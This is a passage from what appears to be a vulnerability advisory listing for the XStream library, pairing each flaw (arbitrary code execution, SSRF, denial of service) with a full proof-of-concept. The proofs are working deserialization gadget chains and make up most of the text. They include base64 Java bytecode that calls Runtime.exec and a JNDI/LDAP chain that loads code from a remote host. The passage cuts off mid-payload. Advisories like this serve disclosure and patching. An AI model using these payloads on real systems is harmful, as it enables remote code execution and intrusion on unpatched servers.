                      <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAbeXNvc2VyaWFsL1B3bmVyNjMzNTA1NjA2NTkzAQAdTHlzb3NlcmlhbC9Qd25lcjYzMzUwNTYwNjU5MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>
                      <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
                    </__bytecodes>
                    <__transletIndex>-1</__transletIndex>
                    <__indentNumber>0</__indentNumber>
                  </default>
                </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
              </proxy>
              <implementing__method>
                <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
                <name>getOutputProperties</name>
                <parameter-types/>
              </implementing__method>
            </sun.tracing.dtrace.DTraceProbe>
          </entry>
        </probes>
      </defaultHandler>
    </handler>
  </dynamic-proxy>
</linked-hash-set>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Arbitrary Code Execution?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Arbitrary Code Execution

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &#x3C;none&#x3E;</m__obj>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
          <parsedMessage>true</parsedMessage>
          <soapVersion>SOAP_11</soapVersion>
          <bodyParts/>
          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
            <attachmentsInitialized>false</attachmentsInitialized>
            <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
              <soapPart/>
              <mm>
                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                  <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
                    <homeCtx>
                      <hostname>233.233.233.233</hostname>
                      <port__number>2333</port__number>
                      <clnt class='com.sun.jndi.ldap.LdapClient'/>
                    </homeCtx>
                    <hasMoreCalled>true</hasMoreCalled>
                    <more>true</more>
                    <posn>0</posn>
                    <limit>1</limit>
                    <entries>
                      <com.sun.jndi.ldap.LdapEntry>
                        <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>
                        <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
                          <javax.naming.directory.BasicAttribute>
                            <default>
                              <ignoreCase>false</ignoreCase>
                            </default>
                            <int>4</int>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>objectClass</attrID>
                                </default>
                                <int>1</int>
                                <string>javanamingreference</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>javaCodeBase</attrID>
                                </default>
                                <int>1</int>
                                <string>http://127.0.0.1:2333/</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>javaClassName</attrID>
                                </default>
                                <int>1</int>
                                <string>refClassName</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>javaFactory</attrID>
                                </default>
                                <int>1</int>
                                <string>Evil</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                          </javax.naming.directory.BasicAttribute>
                        </attributes>
                      </com.sun.jndi.ldap.LdapEntry>
                    </entries>
                  </aliases>
                </it>
              </mm>
            </multiPart>
          </sm>
        </message>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Arbitrary Code Execution?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • M
Denial of Service (DoS)

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Denial of Service (DoS). This vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<linked-hash-set>
  <sun.reflect.annotation.AnnotationInvocationHandler serialization='custom'>
    <sun.reflect.annotation.AnnotationInvocationHandler>
      <default>
        <memberValues class='javax.script.SimpleBindings'>
          <map class='javax.script.SimpleBindings' reference='..'/>
        </memberValues>
        <type>javax.xml.transform.Templates</type>
      </default>
    </sun.reflect.annotation.AnnotationInvocationHandler>
  </sun.reflect.annotation.AnnotationInvocationHandler>
</linked-hash-set>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Denial of Service (DoS)?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Server-Side Request Forgery (SSRF)

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.

PoC

<map>
  <entry>
    <jdk.nashorn.internal.runtime.Source_-URLData>
      <url>http://localhost:8080/internal/</url>
      <cs>GBK</cs>
      <hash>1111</hash>
      <array>b</array>
      <length>0</length>
      <lastModified>0</lastModified>
    </jdk.nashorn.internal.runtime.Source_-URLData>
    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
  </entry>
  <entry>
    <jdk.nashorn.internal.runtime.Source_-URLData>
      <url>http://localhost:8080/internal/</url>
      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
      <hash>1111</hash>
      <array>b</array>
      <length>0</length>
      <lastModified>0</lastModified>
    </jdk.nashorn.internal.runtime.Source_-URLData>
    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
  </entry>
</map>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Server-Side Request Forgery (SSRF)?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Server-Side Request Forgery (SSRF)

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <dynamic-proxy>
      <interface>java.lang.Comparable</interface>
      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
        <owner/>
        <managedObjectManagerClosed>false</managedObjectManagerClosed>
        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
          <stubHandlers>
            <entry>
              <method>
                <class>java.lang.Comparable</class>
                <name>compareTo</name>
                <parameter-types>
                  <class>java.lang.Object</class>
                </parameter-types>
              </method>
              <com.sun.xml.internal.ws.client.sei.StubHandler>
                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
                  <indices>
                    <int>0</int>
                  </indices>
                  <getters>
                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
                  </getters>
                  <accessors>
                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
                      <val_-isJAXBElement>false</val_-isJAXBElement>
                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
                        <type>int</type>
                        <field>
                          <name>hash</name>
                          <clazz>java.lang.String</clazz>
                        </field>
                      </val_-getter>
                      <val_-isListType>false</val_-isListType>
                      <val_-n>
                        <namespaceURI/>
                        <localPart>hash</localPart>
                        <prefix/>
                      </val_-n>
                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
                        <type>java.lang.String</type>
                        <method>
                          <class>jdk.nashorn.internal.runtime.Source</class>
                          <name>readFully</name>
                          <parameter-types>
                            <class>java.net.URL</class>
                          </parameter-types>
                        </method>
                      </val_-setter>
                      <outer-class>
                        <propertySetters>
                          <entry>
                            <string>serialPersistentFields</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>[Ljava.io.ObjectStreamField;</type>
                              <field>
                                <name>serialPersistentFields</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>CASE_INSENSITIVE_ORDER</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>java.util.Comparator</type>
                              <field>
                                <name>CASE_INSENSITIVE_ORDER</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>serialVersionUID</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>long</type>
                              <field>
                                <name>serialVersionUID</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>value</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>[C</type>
                              <field>
                                <name>value</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>hash</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>int</type>
                              <field reference='../../../../../val_-getter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                        </propertySetters>
                        <propertyGetters>
                          <entry>
                            <string>serialPersistentFields</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>[Ljava.io.ObjectStreamField;</type>
                              <field reference='../../../../propertySetters/entry/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>CASE_INSENSITIVE_ORDER</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>java.util.Comparator</type>
                              <field reference='../../../../propertySetters/entry[2]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>serialVersionUID</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>long</type>
                              <field reference='../../../../propertySetters/entry[3]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>value</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter>
                              <type>[C</type>
                              <field reference='../../../../propertySetters/entry[4]/com.sun.xml.internal.ws.spi.db.FieldSetter/field'/>
                            </com.sun.xml.internal.ws.spi.db.FieldGetter>
                          </entry>
                          <entry>
                            <string>hash</string>
                            <com.sun.xml.internal.ws.spi.db.FieldGetter reference='../../../../val_-getter'/>
                          </entry>
                        </propertyGetters>
                        <elementLocalNameCollision>false</elementLocalNameCollision>
                        <contentClass>java.lang.String</contentClass>
                        <elementDeclaredTypes/>
                      </outer-class>
                    </com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
                  </accessors>
                  <wrapper>java.lang.Object</wrapper>
                  <bindingContext class='com.sun.xml.internal.ws.db.glassfish.JAXBRIContextWrapper'/>
                  <dynamicWrapper>false</dynamicWrapper>
                </bodyBuilder>
                <isOneWay>false</isOneWay>
              </com.sun.xml.internal.ws.client.sei.StubHandler>
            </entry>
          </stubHandlers>
          <clientConfig>false</clientConfig>
        </databinding>
        <methodHandlers>
          <entry>
            <method reference='../../../databinding/stubHandlers/entry/method'/>
            <com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
              <owner reference='../../../..'/>
              <method reference='../../../../databinding/stubHandlers/entry/method'/>
              <isVoid>false</isVoid>
              <isOneway>false</isOneway>
            </com.sun.xml.internal.ws.client.sei.SyncMethodHandler>
          </entry>
        </methodHandlers>
      </handler>
    </dynamic-proxy>
    <url>http://localhost:8080/internal/</url>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Server-Side Request Forgery (SSRF)?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Arbitrary Code Execution

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream, if using the version out of the box with Java runtime version 14 to 8 or with JavaFX installed. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='com.sun.java.util.jar.pack.PackageWriter$2'>
        <outer-class>
          <verbose>0</verbose>
          <effort>0</effort>
          <optDumpBands>false</optDumpBands>
          <optDebugBands>false</optDebugBands>
          <optVaryCodings>false</optVaryCodings>
          <optBigStrings>false</optBigStrings>
          <isReader>false</isReader>
          <bandHeaderBytePos>0</bandHeaderBytePos>
          <bandHeaderBytePos0>0</bandHeaderBytePos0>
          <archiveOptions>0</archiveOptions>
          <archiveSize0>0</archiveSize0>
          <archiveSize1>0</archiveSize1>
          <archiveNextCount>0</archiveNextCount>
          <attrClassFileVersionMask>0</attrClassFileVersionMask>
          <attrIndexTable class='com.sun.javafx.fxml.BeanAdapter'>
            <bean class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'>
              <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
                <default>
                  <__name>Pwnr</__name>
                  <__bytecodes>
                    <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEAKG9wZW4gL1N5c3RlbS9BcHBsaWNhdGlvbnMvQ2FsY3VsYXRvci5hcHAIADABAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAyADMKACsANAEADVN0YWNrTWFwVGFibGUBAB55c29zZXJpYWwvUHduZXIyMDU0MTY0NDMxMDIwMTkBACBMeXNvc2VyaWFsL1B3bmVyMjA1NDE2NDQzMTAyMDE5OwAhAAIAAwABAAQAAQAaAAUABgABAAcAAAACAAgABAABAAoACwABAAwAAAAvAAEAAQAAAAUqtwABsQAAAAIADQAAAAYAAQAAAC8ADgAAAAwAAQAAAAUADwA4AAAAAQATABQAAgAMAAAAPwAAAAMAAAABsQAAAAIADQAAAAYAAQAAADQADgAAACAAAwAAAAEADwA4AAAAAAABABUAFgABAAAAAQAXABgAAgAZAAAABAABABoAAQATABsAAgAMAAAASQAAAAQAAAABsQAAAAIADQAAAAYAAQAAADgADgAAACoABAAAAAEADwA4AAAAAAABABUAFgABAAAAAQAcAB0AAgAAAAEAHgAfAAMAGQAAAAQAAQAaAAgAKQALAAEADAAAACQAAwACAAAAD6cAAwFMuAAvEjG2ADVXsQAAAAEANgAAAAMAAQMAAgAgAAAAAgAhABEAAAAKAAEAAgAjABAACQ==</byte-array>
                    <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
                  </__bytecodes>
                  <__transletIndex>-1</__transletIndex>
                  <__indentNumber>0</__indentNumber>
                </default>
              </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
            </bean>
            <localCache>
              <methods>
                <entry>
                  <string>getOutputProperties</string>
                  <list>
                    <method>
                      <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
                      <name>getOutputProperties</name>
                      <parameter-types/>
                    </method>
                  </list>
                </entry>
              </methods>
            </localCache>
          </attrIndexTable>
          <shortCodeHeader__h__limit>0</shortCodeHeader__h__limit>
        </outer-class>
      </comparator>
    </default>
    <int>3</int>
    <string-array>
      <string>yxxx</string>
      <string>outputProperties</string>
    </string-array>
    <string-array>
      <string>yxxx</string>
    </string-array>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>
XStream xstream = new XStream();
xstream.fromXML(xml);

How to fix Arbitrary Code Execution?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

[,1.4.18)
  • H
Arbitrary Code Execution

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <dynamic-proxy>
      <interface>java.lang.Comparable</interface>
      <handler class='com.sun.xml.internal.ws.client.sei.SEIStub'>
        <owner/>
        <managedObjectManagerClosed>false</managedObjectManagerClosed>
        <databinding class='com.sun.xml.internal.ws.db.DatabindingImpl'>
          <stubHandlers>
            <entry>
              <method>
                <class>java.lang.Comparable</class>
                <name>compareTo</name>
                <parameter-types>
                  <class>java.lang.Object</class>
                </parameter-types>
              </method>
              <com.sun.xml.internal.ws.client.sei.StubHandler>
                <bodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'>
                  <indices>
                    <int>0</int>
                  </indices>
                  <getters>
                    <com.sun.xml.internal.ws.client.sei.ValueGetter>PLAIN</com.sun.xml.internal.ws.client.sei.ValueGetter>
                  </getters>
                  <accessors>
                    <com.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2>
                      <val_-isJAXBElement>false</val_-isJAXBElement>
                      <val_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'>
                        <type>int</type>
                        <field>
                          <name>hash</name>
                          <clazz>java.lang.String</clazz>
                        </field>
                      </val_-getter>
                      <val_-isListType>false</val_-isListType>
                      <val_-n>
                        <namespaceURI/>
                        <localPart>hash</localPart>
                        <prefix/>
                      </val_-n>
                      <val_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'>
                        <type>java.lang.String</type>
                        <method>
                          <class>javax.naming.InitialContext</class>
                          <name>doLookup</name>
                          <parameter-types>
                            <class>java.lang.String</class>
                          </parameter-types>
                        </method>
                      </val_-setter>
                      <outer-class>
                        <propertySetters>
                          <entry>
                            <string>serialPersistentFields</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>[Ljava.io.ObjectStreamField;</type>
                              <field>
                                <name>serialPersistentFields</name>
                                <clazz>java.lang.String</clazz>
                              </field>
                            </com.sun.xml.internal.ws.spi.db.FieldSetter>
                          </entry>
                          <entry>
                            <string>CASE_INSENSITIVE_ORDER</string>
                            <com.sun.xml.internal.ws.spi.db.FieldSetter>
                              <type>java.util.Comparator</type>
                              <field>
                                <name>CASE_INSENSITIVE_ORDER</name>
